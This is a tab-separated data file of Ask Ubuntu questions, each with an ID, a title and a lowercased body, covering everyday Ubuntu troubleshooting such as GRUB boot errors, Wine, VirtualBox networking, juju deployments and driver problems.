267678	livemeeting in ubuntu	i wanted to use microsoft livemeeting session in firefox browser . i have downloaded java7 tar file , then unzipped the same . then i linked the plugin using below code sudo ln -vs /usr/lib/mozilla/plugins/libnpjp2.so /usr/lib/jvm/java-6-sun/jre/lib/i386/libnpjp2.so now i want to go to sun java control panel , to do some steps mentioned here , as i face the same issue go to system > preferences > sun java 6 plugin control panel go to tab advanced , open security , open mixed code , and select option `` enable - hide warning and run with protections '' . however , i am not sure where this control panel is ? can somebody help me . i mentioned the steps that was performed .
267684	problem with ubuntu startup	sometimes my ubuntu gets stuck with purple screen , and the only way to get out of that is a reboot . i have enabled verbose mode in grub2 , but i see nothing on the screen . or sometimes in low resolution mode . however , sometimes it boots correctly and prints all the things at startup . and sometimes it gets stuck after printing `` detecting usb number 3 ... '' my system is a lenovo u410 with ubuntu 12.04 . i have installed bumblebee , and it works fine ( i tried it with optirun ) . i have checked the pci devices , and both my graphic cards are known . i think there is a problem with my usb 3.0
267689	agent-state pending in juju node ... null public-address associated ?	maas/juju does not unfortunately manage the attribution of resolving the ip address . in fact , once adding a new node , it seems that the agent-state is still pending forever , and of course for the other nodes : 6 : agent-state : not-started dns-name : maas03 instance-id : /maas/api/1.0/nodes/node-3550ded6-8be1-11e2-bfa6-0050561dd02a/ instance-state : unknown 7 : agent-state : not-started dns-name : maas04 instance-id : /maas/api/1.0/nodes/node-bee399c6-8c7d-11e2-aea1-0050561dd02a/ instance-state : unknown services : ceph : charm : local : precise/ceph-91 relations : mon : - ceph units : ceph/6 : agent-state : pending machine : 6 public-address : null glance : charm : local : precise/glance-79 relations : { } units : glance/0 : agent-state : pending machine : 7 public-address : null we can notice that the public-address is always null ( ? ? ? ) . after disabling the firewall , destroying the env and restarting from scratch , it still is n't resolved . we have no idea about how it delivers this public-address ! ? that 's a lot of problems with juju found . it seems quite complicated to see what 's wrong .
267690	installing 64bit as 32 bit	i had downloaded ubuntu the 64-bit version of 12.04 but i have an old computer which does not meet the minimum requirements for 64bit . can i install the 32bit version from this download or will i need to download the 32bit version ?
267691	ubuntu one : file sync in progress on mac	i use ubuntu one on windows , ubuntu and mac computers . i 've not had any issue with ubuntuone on the windows or ubuntu machine and it has been file for months on the mac until yesterday . now it stalls at the file sync in progress and does n't do anything . i have tried disconnecting and reconnecting .
267696	how can i run ssh as a different user on the same ubuntu installation ?	i am creating a script which runs a series of command that would download a website to a machine and sets up everything . so most of the commands require root access . for example adding a vhost in /etc/apache2/sites-available , enabling it , restarting apache , etc ... so in order to do that , i need to run the script with sudo . sudo ./install-website.sh the website is located on a server with a git repository which is setup with a password-less ssh access . but that only works for the user dan since the keys are in my home folder and not in the root 's home folder . so when it reaches this part : git clone user @ host.com : git-repo $ path_to_installation since i started the script with sudo , the user that is trying to initiate the git command is root . so the host keeps asking for the host 's user 's password . i have tried the following command : sudo -u $ sudo_user git clone user @ host.com : git-repo $ path_to_installation but it was still asking for the host 's user 's password . is it possible to tell sudo to use the $ sudo_user 's home path ? most of the stuff are variables , and have to be variables as i will run this on more than 1 machine .
267698	how do i use ffmpeg 's -filter_complex	i am using ffmpeg version svn-r0.5.9-4:0.5.9-0ubuntu0.10.04.3 and it does n't allow me to use -filter_complex it shows : '' ffmpeg : unrecognized option '-filter_complex ' '' i want to overlay 2 videos , how can i get that option ?
267700	limitations of ubuntu cloud infrastructure with respect to os ?	i am setting up an openstack cloud based on maas and juju . once i have this cloud ready then is it possible to run different operating systems on this cloud or its limited to ubuntu os only . remember i am not talking about base os used by maas but the operating system that i am gon na use later in 'i think ' openstack dash board or somewhere on top of this cloud . i have got some tiny os that i want to run on this cloud so is that possible or ubuntu cloud infrastructure does not support any other operating system then ubuntu .
267703	does ubuntu run from a cd/dvd save data only in memory ?	if i create a proper livecd and run the os from the disc does it save any information on a hard-drive or is it all saved to the pc 's memory ? i 've looked around for a clear , direct `` yes/no '' answer to this question but i ca n't seem find it anywhere . common sense would say yes but you never know and what i need to do requires an os that does not use flash ( usb ) or magnetic ( hd ) storage of any kind while in operation . thanks ! edit : typos , wording
267707	problem is installation with scilab 5.4.0	after installation whenever i am trying to run scilab , i m getting the following message . please help . scilab-bin : error while loading shared libraries : libxss.so.1 : can not open shared object file : no such file or directory
267710	installation issues of ubuntu 12.10 or 12.04 in hp z820 workstation	i have a brand new hp z820 workstation where i would like to install ubuntu . however it fails to boot from usb when i select `` install ubuntu '' from grub menu and keeps restarting . i played with various bios settings with little avail . i also selected usb device from uefi and legacy boot options but it fails to boot . any suggestions will be greatly acknowledged .
267715	how to log memory usage per minute on ubuntu server ?	i checked few programs such as htop or top command but could n't find any features for logging per minute . is there a way to do that for tracking memory issues ? edit : i was using linode and decided to use longview .
267716	what plugin is needed	what plugin can help me to watch live video here http : //www.aasthatv.co.in/gpage1.html i am using ubuntu 12.04 64 bit . update based on down voting and comments below there are a lot of devices which do not have drivers for linux but that does not mean that they can not be used on linux , example usb modems http : //www.draisberghof.de/usb_modeswitch/ there is a big community of people which tells work arounds hacks blah blah ... to make them work , so if a webmaster does not know how to make things work on linux that does not mean it can not be viewed on linux there must be some way or work around and that is the reason i asked ... .because if on a linux forum you say things do not work the way then why in the world i need to have ubuntu on my system and if linux guys can not figure it out how to make it work what is this forum for ?
267721	adding touch to grub2 ?	are there any projects out there working to add touch sensitivity to grub2 ? if not what touch libraries exist in ubuntu 13.04 that may be a possible candidates to implement this after integrating ? edit : march 14 , 2013 @ 5:10pm pst i have been searching hard and have found the following packages under ubuntu 13.04 : mutouch ( i believe this came from utouch , an older package that ubuntu used to use. ) libfile-touch-perl tslib pymt touchegg libframe6 i will be going through these and hopefully come up with a answer soon . if you are familiar with any of these libraries a reply would be beautiful . in my brief passing of each of these it seemed that tslib and pymt as they are not platform dependant like grub .
267722	how to configure and run hadoop cluster on lvm ( logical volume manager )	well i am new to the concepts of lvm ( local volume manager ) and have create volumes in ubuntu actually i am using windows and putty.now i have also created lvm in that putty . my question is whether it is possible to configure and run hadoop cluster in lvm ( logical volume manager ) and if yes how to do it
267727	firefox multi-core when opening a list of bookmarks ?	is there a way to configure firefox to use all available cores when opening a list of bookmarks ? for example , if i open a list of 10 bookmarks in one go , i would like firefox to use all 4 cores available in my ubuntu 12.04 32-bit laptop to speed up the rendering of the pages . but it seems like the only 1 core is used of the processor use in the system monitor widget . do i need to explicitly configure this in any way ? according to google , firefox got multi-core improvements in the last 2 years . i am using version 19 but also downloaded version 20 , so far with same results . ps : i am not sure if this question is ubuntu or linux-specific , so if it is generic enough to firefox that would make it more adequate to go to superuser.com or elsewhere , please let me know .
267728	people nearby contacts appears twice in empathy list , how to correct this ?	using empathy and `` people nearby '' in ubuntu 12.04 , my contacts appears twice . this bothers me , how can i correct this ?
267733	ubuntu is not booting after installing windows 8 in same machine ?	in my machine i installed ubuntu 11 os first in /dev/sda2 ( d drive ) and then i installed windows8 in c drive.after installation i am not able to see ubuntu in the multi os menu though space is reserved . i guess the boot loader is corrupt.any suggestion on this will help
267736	how do i enable the carddav server of the calendarserver package ?	i installed the calendarserver package which provided me with a working instance of the darwin calendar and contacts server , a caldav and carddav server . the caldav part seems to be working okay . i can create accounts and share calendars between multiple devices . i am unable to connect to the carddav server to share contacts . how do i enable the carddav server of the calendarserver package ? i am finding documentation on calendarserver very difficult to locate , and what i do find is very outdated .
267737	improving virtual ubuntu hdd performance running on windows host	i have a windows 2008 r2 server with : 1 x 80gb scsi , partitioned : 100mb reserved 79gb ntfs windows 2 x 1tb scsi hdd running in a hardware raid 0 striped configuration , partitioned : 7gb raw ( left for guest swap ) 877gb raw ( left for guest root ) 976gb ntfs ( used for other vm ) i 'm trying to use the 2 raw partitions for the linux vm as i 've seen that the default emulated virtual hdd seem to hurt i/o performance . i 've configured the hdd in vmware 8 for the vm but the ubuntu 12.10 server install shows the hdd as having the real full size ( 2tb ) , not the partition ( 877gb ) . i 've read on the internet that scsi can cause issues with vmware raw hdd , but i do n't know how up to date that information is for vmware 8 . if so would virtualbox 's raw hdd work in this case ? are there any methods i could use to improve hw i/o , as i want to use a mysql database in the vm that would require lots of writes and reads . raid controller : model : dell perc 6/i integrated / adapter interface support : 3gb/s sas pci support : pci-express 1.0 sas connectors : 2x4 internal cache memory size : 256mb write back cache : yes ( bbu ) raid levels : 0,1,5,6,10,50,60 max drive support : 16 raid support : hardware raid
267743	why did i stop getting thunderbird email notifications ?	i 'm not getting notifications anymore , when a new email in thunderbird arrives . how can i fix this and continue getting notifications ? i 'm running ubuntu 12.04 with the xfce desktop environment .
267746	how can i install the latest upstream version of imagemagick without compiling ?	i had some issues with imagemagick and i was told ubuntu 's default imagemagick package is an ancient version and i should upgrade to resolve my issues . how can i do that ? i have the latest ubuntu version ( 12.10 ) . synaptic shows me 8:6.7.7.10-2ubuntu4 as the latest version of im . it means my im version is 6.7.7.10 ( convert -- version outputs the same ) . im does not provide deb binaries itself . debian has something newer , but in some testing/experimental branches if i understand it well . i found im on launchpad , but there are no instructions how to add this to my sources , it seems it is not one of the usual ppas i meet when searching for the latest/beta software . i do n't know how to work with this one . is there a way how to mark a package to be taken from some bleeding edge sources and leave the rest of my system to be taken from standard sources ? it would be probably the best to upgrade to the last stable version of im ( 6.8 ) , but that is probably sci-fi as it is not even in debian . however , i need at least 6.7.9 . note : i want to avoid compilation from source . i hate having installed something and not being able to manipulate with it easily with apt-get or synaptic . moreover , there are no updates for compiled programs . always i compile i feel like going against the system , like using glue , wires and duck tape . no , i do not want to compile it for sure .
267747	what does it mean that my gpu is running 0 ops per second	i am currently running an ubuntu 12.04 laptop built by system76 . i fired up powertop , which i do frequently because my battery life on this machine is attrocious , and i noticed a line at the top which concerns me : summary : 594.2 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec specifically , that 0.0 gpu ops per second . does n't most of x run in the gpu these days ? could this indicate that maybe my gpu is in some way disabled ( which would indicate why psychonauts was unplayable on this system ) and ( even more importantly to me ) that battery is being wasted on doing video operations in the processor ? according to lspci , here is my video controller . i 'll need some pointers on where else to find useful information . 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 )
267751	script that opens webpage and records it as cron job	i need and have to create a script that takes webpage address and time in seconds as arguments . it records whatever is shown on the webpage - i.e . javascript and html content ( flash not required ) . script is going to be run non-interactively as a cron job . other constraints are that it can not start a login manager or hijack an already running x server . also can not assume that a login manager is installed or what kind of graphics adapter is built into the server . this semi-solution is what i came up with so far , but it 's not good because of the xserver and because it need to be run as cron job . also it needs to be run on latest ubuntu or debian ! if you have any other workarounds or suggestions , just say ! : ) if [ $ # -ne 3 ] then echo `` arguments missing ! `` ; echo `` entered : $ 0 $ 1 $ 2 $ 3 ( out of $ # vars ) '' ; echo `` should be : $ 0 http : //feri.uni-mb.si/ 60s i_stare_at_websites_everyday.ogv '' ; exit fi # continued ... url= $ 1 ; time= $ 2 ; outfile= $ 3 ; echo `` ++ using url : $ url '' ; echo `` ++ capturing browser window for $ time seconds '' ; # chromium is used as a better workaround for firefox 's safe mode pita browser.jar settings unpack+set+pack bug # firefox $ 1 & chromium-browser -- disable-translate -- app= $ url -- user-data-dir /tmp & browserpid= $ ! # sleep for 4 secodns = loading firefox + webpage loading time 2+2 ? # recordmydesktop has a delay argument which does n't work . # we need to sleep the execution old school way . sleep 4s unset xc yc wc hc eval $ ( xwininfo -id $ ( xdotool getactivewindow ) | sed -n -e `` s/^ \+absolute upper-left x : \+\ ( [ 0-9 ] \+\ ) . */xc=\1/p '' \ -e `` s/^ \+absolute upper-left y : \+\ ( [ 0-9 ] \+\ ) . */yc=\1/p '' \ -e `` s/^ \+width : \+\ ( [ 0-9 ] \+\ ) . */wc=\1/p '' \ -e `` s/^ \+height : \+\ ( [ 0-9 ] \+\ ) . */hc=\1/p '' ) echo `` starting capture ... '' ; recordmydesktop -x= $ xc -y= $ yc -- width= $ wc -- height= $ hc -o $ outfile 2 & > /tmp/record_script_log & # 2 & > /tmp/recording_script.log & recorderpid= $ ! echo `` ++ firefox process id : $ firefoxpid , rcd id : $ recorderpid , recording for : $ time '' ; sleep $ time echo `` ++ all done ! cleaning up ... '' echo `` ++ file saved as $ outfile '' ; # shut down `` record my desktop '' nicely kill $ recorderpid kill -9 $ browserpid
267753	gnome 3 window decoration	is there a way to disable , on a per application basis , the window decoration associated with gnome ? in this case , in particular it 's windows associated with playonlinux/wine . i still have to use ms office for some things , however infrequently , and it seems that most of the functionality is `` cut off '' by gnomes window decoration . here 's an example :
267757	ubuntu not allowing me to log in after upgrade from 10.04 to 12.04	i upgraded from ubuntu 10.04 to 12.04 and it went fine . after restart , when i try to log in from my root user it shows a command screen in a split second and then returns back to the log in screen which shows all users . i have even tried to test logging in with other users and it is working fine . i guess there is some problem with home folder of my user or something . kindly help me out otherwise my only hope is to make a fresh install from a cd which i am avoiding . thanks in advance .
267759	can not conect to the internet using chromium or firefox	i use ubuntu 12.10 64 bit . the issue is that i am not able to connect to the internet using browsers . the software center is always able to connect ( the pictures of apps load ) . so i do not think that my wireless network card does not work . i think it is a browser related problem . can you help me ?
267760	grub error : out of disk when booting 12.04 server with hardware raid5 and gpt	i 'm trying to do a new install of 12.04 server on one node of a dell poweredge c6145 with the following spec : 48 cores 512gb ram lsi megaraid 9265 controller 4x2tb disks , configured with raid5 giving 6tb in total american megatrends v02.69 bios booting from a usb with ubuntu server 12.04.2 lts `` precise pangolin '' - release amd64 ( 20130214 ) expert mode is turned on ( using f6 ) and doing a clean install of ubuntu server its a standard installation except for a manual parition of the disks . i created a new empty gpt partition table on the disk , and added three partitions : # 1 10mb , beginning of disk , /boot , reserved bios boot area # 2 512gb , end of dist , /swap , swap area # 3 max , / , mount point : / , mount options : defaults , label : data summary : scsi6 ( 2,0,0 ) ( sda ) - 6.0 tb lsi mr9265-8i 1.0 mb free space # 1 9.4 mb f biosgrub /boot # 3 5.5 tb f ext4 / / # 2 512.0 gb f swap /swap swap 1.0 mb free space i selected linux-generic-lts-quantal as the kernel to install , and `` generic : include all available drivers '' when asked to select drivers to include in initrd . for additional software : restricted software : no software from universe component : yes softare from multiverse component : no backported software : yes when installing the grub boot loader , selected yes to install it to the master boot record . no errors produced and installer skipped over the next item in the main menu `` continue without boot loader '' at `` finish the installation '' , standard message saying installation complete and going to reboot on reboot , get : error : out of disk . grub rescue > typing ls ( hd0 ) ( hd0 , gpt3 ) ( hd0 , gpt2 ) ( hd0 , gpt1 ) typing ls ( hd0 , gpt3 ) error : bad filename . typing ls ( hd0 , gpt2 ) error : unknown filesystem . typing ls ( hd0 , gpt1 ) error : unknown filesystem . rebooting from ubuntu usb and selecting rescue a broken system : went through various steps until enter rescue mode reached /dev/sda3 selected as device to use as root file system selected execute a shell in /dev/sda3 $ df -l filesystem 1k-blocks used available use % mounted on /dev/sda3 5316685816 901368 5047839028 1 % / devtmpfs 264147596 0 264147596 0 % /dev /dev/sdb1 5316685816 901368 5047839028 1 % /media/cdrom devpts 264147596 0 264147596 0 % /dev/pts none 52837212 212 52837000 1 % /run ls /boot shows initrd.img-3.5.0-23-generic and vmlinuz-3.5.0-23-generic and populated grub directory , including grub.cfg . also /etc/default/grub looks reasonable back in the installer , selected `` reinstall grub boot loader '' selected /dev/sda and no error or message produced rebooting the system again , and i still get the same `` error : out of disk '' grub error booting from the usb again and selecting `` rescue a broken system '' . went through the various steps until `` enter rescue mode '' reached . selected `` execute a shell in /dev/sda3 '' ran 'grub-install /dev/sda ' and got the message : installation finished . no error reported ran 'update-grub ' and got : generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-23-generic found initrd image : /boot/initrd.img-3.5.0-23-generic found memtest86+ image : /boot/memtest86+.bin done rebooting still gives the same `` error : out of disk '' grub error . apologies for the length of this . any help would be very much appreciated kieran some additional details from the grub rescue > prompt . typing set gives : prefix= ( hd0 , gpt3 ) /boot/grub root=hd0 , gpt3 typing ls / or ls ( hd0 , gpt3 ) / gives : ./ ../ lost+found/ etc/ media/ initrd.img var/ lib/ usr/ proc/ dev/ run/ root/ tmp/ home/ mnt/ sbin/ bin/ lib64/ selinux/ sys/ srv/ opt/ umlinuz there is no /boot directory . typing ls ( hd0 , gpt3 ) /root/ gives : ./ ../ .profile .bashrc but typing ls ( hd0 , gpt3 ) /etc/ gives error : out of disk . there are similar mixed results with other directories .
267762	replace fedora partition with ubuntu	so i tried installing fedora along side windows 7 and after a week of using fedora , i ca n't stand it and i 'm switching back to ubuntu . i 'm unsure of how to install ubuntu in place of fedora . below is the screen shot of the partitions i have . ( sorry for the low quality , taken from my phone ) i 'm not sure exactly which device i should be clicking on to install . my gut says i should select the root of ext4 to install . i do n't see anywhere that i can delete those partions , only formatting is an option . suggestions ?
267767	ati graphics drivers problem	i recently installed ubuntu 12.10 and in my graphic details it says that it is unknown . i tried to install the drivers from the amd website and it installed perfectly , but when i reboot , after my login it only shows my desktop image and my resolution is changed . so i uninstalled with the instructions from this website : how do i remove ati/amd drivers downloaded from their site ? my computer is a asus f5sl ; dual core 1.8ghz ; ati radeon hd 3470 ; 3gb ram ; 250gb hdd ; 30gb partition for ubuntu ; dual boot with windows 7 .
267769	compaq aspire 5610z wireless card now inop with 12.10 install . totally clueless newbie	i installed ubuntu on a vista pc using wubi . the wireless card is inop now . what is the manner to fix the wireless card ? i am a first time user . totally lost . using 12.10 and i have a flashstick . this is a compaq aspire 5641z laptop . this has a broadcom 802.11g network adapter .
267772	unable to use xchat	i have xchat installed , and when i start it , i get errors : looking up irc.mintirc.net looking up 172.16.1.10 connecting to 172.16.1.10 ( 172.16.1.10 ) port 8080 ... http/1.0 403 forbidden proxy traversal failed . stopped previous connection attempt ( pid=20871 ) i am behind a proxy server , please help .
267774	erro install pecl id3 tag support module for php	i 'm trying unsuccessfully to install id3 from pecl ( tutorial ) . so , i did : mkdir id3tmp cd id3tmp wget http : //pecl.php.net/get/id3-0.2.tgz tar -zxvf id3-0.2.tgz pecl build and here , i got the error : error : initializer element is not computable at load time error : ( near initialization for 'id3_functions [ 8 ] ' ) from google for this error i got very little , nothing significant . how can i solve this error ? or , how to successfully install id3 from pecl on ubuntu ?
267777	ca n't get passed the welcome screen	i have a acer aspire 5553 quad core 64 bit windows 7 . i can boot ubuntu 12.10 from a live cd , but when i get to welcome screen ( language choice , try ubuntu or install ubuntu ) . i have no response from the touch pad or the keyboard . so can do nothing but power down and boot back to windows . what 's wrong ? same problem applies to 12.10 , 12.04 . 64 and 32 bit
267783	installing tt-rss : files ar n't where they ought to be	i 'm currently trying to install the tt-rss package ( tiny tiny rss ) on ubuntu 12.10 via ubuntu 's official packages . the installation process seems to have worked - but the files i need to run are on /usr/share/tt-rss rather than /var/www/something . its obviously not working for me - the databases seem to be set up ; the install process went through once i worked out i needed mysql client and server , but the web server is n't picking up the tt-rss install . what else do i need to do to get tt-rss working ?
267785	nautilus times out too soon	i have a nas with all my music on it . it 's a large collection , so listing up all folders with artists takes some time . however , nautilus seems to give a time out when it 's not able to fetch the list within a couple of seconds . i 'm pretty sure the problem is at the client side , since osx is able to show the list . is there a way to increase the time before such error is thrown ?
267786	syncing folders between wine and windows for foobar2000	i use foobar2000 on windows to manage and play my music and and looking to get foobar2000 working under wine on ubuntu . ive gotten the program to run fine and am just looking for a way to not have to maintain two copies of my music files . so i have my music on windows drive e : music , but wine creates a virtual c drive and im wondering if i can somehow link a folder on the virtual drive to a folder on the actual e drive so that the files are visible in the virtual environment . basically i wan na have 1 music collection and avoid having to double manage files on my linux and windows systems and would accept any tips for achieving this . thanks for the help !
267793	how to make use of f2fs ?	i am very interested in f2fs , so i installed f2fs-tools ( file system for ssd/nand drives ) so my questions are : how do i use it ? is it safe to use ? can i format a usb drive with f2fs and again , would that be safe ?
267796	how can i configure isc dhcpd to provide option 150 for cisco phones ?	cisco phones use the proprietary option 150 to tell the phone what server to contact for configuration information . how can i provide this option using the isc dhcp server on ubuntu ?
267797	swapped graphics card , ended with dead system	where to start ... . my os is ubuntu server 12.04.2 amd64 ( no specific reason to get server other than avoiding any preset desktop environment right out of the box ) . i was having the fun of my lifetime with my switch from windows to ubuntu thanks to a nas issue , scanner not working etc etc when i swapped graphics card with a friend ( switched from gtx560ti to gtx 550ti . this is temporary ) and the os stopped booting . the graphics driver is nouveau and the boot usually stops after detecting keyboard so i suspected that driver . i chrooted into the system , but could n't find any way to reinstall , reconfigure or even remove old config of nouveau . i could not find any standard way to debug boot issues other than a suggested ssh hack that . before i was able to attempt that , the system somehow became even more damaged and now boot stops right at grub . i can see no grub menu , nothing . repairing grub did not help . if nothing else works , i am switching over to 12.10 desktop and purging gnome post-install because that os has got a repair install option if i heard right ? update : i have fixed grub , but ubuntu is still getting stuck during boot .
267799	how to add an ip ( all ports ) and how to remove that ip ?	i need to connect to my computer remotely ( all ports ) , but that ip changes . i have everthing figured out on how the comp woukd know my current ip , but i do n't know how to add an ip on all ports and remove that ip ( dynamic ip so i 'll remove one and add a new one ) . do n't i need to save the changes during commands ? for the people answering , i already have a no-ip account , and the computer checks that to see when it changes . all i have to do now is add the new ip and remove the old one . also i have my router allow only the ports i need.thanks for trying though .
267801	how to make workspaces joined as extended desktop ?	i 'm working with very wide windows that are longer than my screen width . when i 'm in my office i use two monitors ( laptop + external monitor ) and such windows are spreaded over this extended desktop . when i 'm using my laptop only and i move the wide window behind the edge of workspace 1 , part of it disapears , but does not appear in workspace 2 . i believe there is should be a feature that joins workspaces and makes a sort of extended desktop , but i did not find it . i 'm using ubuntu 12.04 . i will appreciate any suggestion . thank you !
267802	how to run a nested accelerated xserver ?	how can i run a nested accelerated xserver ? i 've tried using xephyr , including using the -fakexa but nothing seems to work . i also tried xnest , but xephyr was intended to be it 's replacement and it too does n't offer acceleration . for xephyr , it appears like work was done in the past to have xephyr support acceleration . it seems this work was never mainlined and/or no longer compiles against the current codebase . http : //gitorious.org/xserver-with-gl-accelerated-xephyr/xserver-with-gl-accelerated-xephyr http : //dodji.blogspot.com/2007/10/xephyr-xvideo-and-gl-has-landed.html note that although i 'm asking about xserver , i would be happy to hear about wayland , mir or whatever else that is capable of running nested with acceleration .
267805	how to use bleachbit to remove completely any selected file or folder ?	the bleachbit website states that the program can `` overwrite specific files found anywhere on the hard drive '' . can i select a file and shred it with bb or do i have to delete it first the normal way and then wipe the empty space to avoid recovery ? i may not want all my empty space wiped or i may not have the time for that . the program displays a list of programs , as well as a 'bash ' and a 'deep scan ' option . it looks it is intended to scan for files that are already hidden or deleted . but what about selecting a specific file/folder and wiping it ?
267806	how to check if openvpn is connected in upstart ?	i need to run a script after mysql and openvpn are started ( ubuntu for arm ) . i can succesfully run the script with upstart with this .conf : # my upstart for logging boot start on ( starting openvpn and started mysql ) script cd /home/ubuntu/developedgz/provamysql/ ./provamysql end script the script always run after mysql but not after openvpn . how can i do that ?
267810	set up partition after dual boot ubuntu 12.04 lts and window 7	so here it 's , i had downloaded wubi.exe , and install and run it successfully . the problem is , when i restart my laptop , the system showed up a secure boot menu ( to choose between win7 or ubuntu ) , after i click into ubuntu , the system did not demand me to set up any partition ... so , i am kind of messed up now , i do n't know what is the limit disk space for ubuntu and windows 7 . how do i set up partition after i dual boot it please help me , kindly reply to me asap ... thanks !
267811	minecraft help !	so this is what i get when i login to minecraft on a 32 bit system 1.7 gig ram and 2.8 ghz prossesor : -- -- minecraft crash report -- -- // ooh . shiny . time : 14/03/13 9:07 am description : failed to start game org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:782 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:871 ) at org.lwjgl.opengl.display.create ( display.java:782 ) at org.lwjgl.opengl.display.create ( display.java:764 ) at net.minecraft.client.minecraft.a ( sourcefile:233 ) at avp.a ( sourcefile:56 ) at net.minecraft.client.minecraft.run ( sourcefile:505 ) at java.lang.thread.run ( unknown source ) a detailed walkthrough of the error , its code path and all known details is as follows : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- system details -- details : minecraft version : 1.5 operating system : linux ( i386 ) version 3.5.0-25-generic java version : 1.7.0_17 , oracle corporation java vm version : java hotspot ( tm ) client vm ( mixed mode , sharing ) , oracle corporation memory : 3996512 bytes ( 3 mb ) / 30793728 bytes ( 29 mb ) up to 1037959168 bytes ( 989 mb ) jvm flags : 1 total ; -xmx1024m aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used suspicious classes : no suspicious classes found . intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 lwjgl : 2.8.3 opengl : ~~error~~ nullpointerexception : null is modded : probably not . jar signature remains and client brand is untouched . type : client ( map_client.txt ) texture pack : default profiler position : n/a ( disabled ) vec3 pool size : ~~error~~ nullpointerexception : null that what i get ... . i am usually a guy who fixes everything himself but i recently installed lubuntu and ... am a newbie . all replies appreciated : )
267815	dell d520 getting hot | 12.10	i know the my laptop is quite hot when it was in win7 , but after i changed os ( ubuntu 12.04 ) , i notice that it gets even hotter . i also notice that when it gets hotter , it 's starting to act slow : ( .. do the laptop temperature has something to do why it 's getting slow like i mention ? but i 'm only running few applications like chrome , terminal and an editor . current i 've tried to upgrade to the latest version of ubuntu which is 12.10 to see if things may change . unfortunately , it did not . my laptop still goes super hot and i 'm hearing the fan always spinning fast . @ ttoine - as per your suggestion i tried to install the cpu frequency indicator , and i 'm currently using the powersave option . it did n't help i think . looking at sensors , the temperature of my laptop is playing between 60-70+ acpitz-virtual-0 adapter : virtual device temp1 : +63.5°c ( crit = +126.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +63.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +63.0°c ( high = +100.0°c , crit = +100.0°c ) -- -- acpitz-virtual-0 adapter : virtual device temp1 : +70.5°c ( crit = +126.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +70.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +70.0°c ( high = +100.0°c , crit = +100.0°c )
267821	how do i uninstall the chrome ( os ) desktop enviroment ?	so , yesterday i installed the chrome os desktop environment for ubuntu ( 12.04 ) . it did n't work ( probably because the install was corrupted ) . but anyways , how can i remove it ?
267831	how to port the bash settings ?	i want my own bash environment vim tmux and so on , that i can customize for my develompment needs . then upload it to github and install whenever i set up my computer new . any howto 's how to proceed ?
267834	how to enable internet with ubuntu 10.04	i have installed ubuntu 10.04 dual with my windows 8. but the internet is disabled , both the ethernet and wireless , i try this link but when type this commands sudo apt-get update there are packages that it fails to install i try to type this command ifconfig , and i see just the lo interface : there is no eth or wlan ?
267836	can not get to ubuntu 12.10 live usb environment on the microsoft surface pro	i 'm attempting to boot a 64bit ubuntu 12.10 live usb on a microsoft surface pro . i do not want to dual boot . i have disabled `` secure boot '' . i have a live usb that can sucsessfully boot on another machine . when i boot , i can get to the grub menu . however , when i select any of the options , `` try ubuntu without installing '' for example , i get a dark screen and the os does n't boot . my only option at that point is to power off . has anyone else had this issue ? i 've researched everywhere i can think of . any ideas what might be wrong ? thanks for the help .
267843	how can i fully maximize wine applications ?	in wine , my maximized applications retain the bar at top with title and minimize/maximize buttons . this duplicates the ubuntu global menu and costs me precious screen space on my laptop . i would like to get rid of this bar in wine either by integrating the two bars or omitting the wine bar . does anyone know how to do this ? i am aware of the askubuntu question at end , which is related , but slightly different . the answer there seems to indicate that it is impossible for application menus in wine to use the global menu bar because of the variety and complexity of menus . to clarify , i do n't need to integrate the application menus , i just want to remove the redundant bar . screenshot can wine software use unity application menu ?
267845	lacie lightscribe program requires root privileges	i am trying to run lacie on ubuntu 12.04 but just get an error saying i need root privileges to print . i am not a programer but ok with computers and have found nothing to work to print on my lightscribe burner . the internet is loaded with people with the same problem but answers are either too complicated or do n't work . i e-mailed hp but just get a sympathy e-mail and no help other then try the simple labeller program which works but is not very good in terms of making a good product . i want to put pictures i make in gimp on the dvd but it 's been months and i ca n't get it to work -- should i just give up ? or do you have an answer . this should not be this difficult .
267846	virtualbox in ubuntu host no internet connection	my hair is in fire trying to make internet connection work in guest os . i have ubuntu 12.10 machine with virtualbox 4.1.18 installed from ubuntu software center i set pc-bsd and freebsd to work as guestos now both guestos have no internet connection . i have tried different methods like : sudo apt-get install dnsmasq and changed the /etc/dnsmasq.d/network-manager config to add except-interface=lo which blocked all of my internet connections . i also added dns-nameservers 8.8.8.8 8.8.4.4 to /etc/network/interfaces and restart the network-manager . finally i did vboxmanage modifyvm `` pc-bsd '' -- natdnshostresolver1 on and vboxmanage modifyvm `` pc-bsd '' -- natdnshostresolver1 on but to no avail . i have already tried nat and different options in bridged too i still do n't have internet connection in guestos , is there anyway i can fix this ? as far as i think the problem is in ubuntu 12.10 for not sharing the internet , but i do n't know how to fix this .
267847	how do i change default printer resolution in ubuntu 12.04 ?	i just installed 12.04 . i have a canon mp970 , which it recognized . however , all my programs print at 300dpi draft . i want to change that to 600dpi draft . i can do it manually but it is n't sticking and i have to do it every time . i ran system-config-printer and changed the resolution , but it is n't flowing into my programs ( gedit , libreoffice , document viewer , etc . ) , even though the change does stick . any help ?
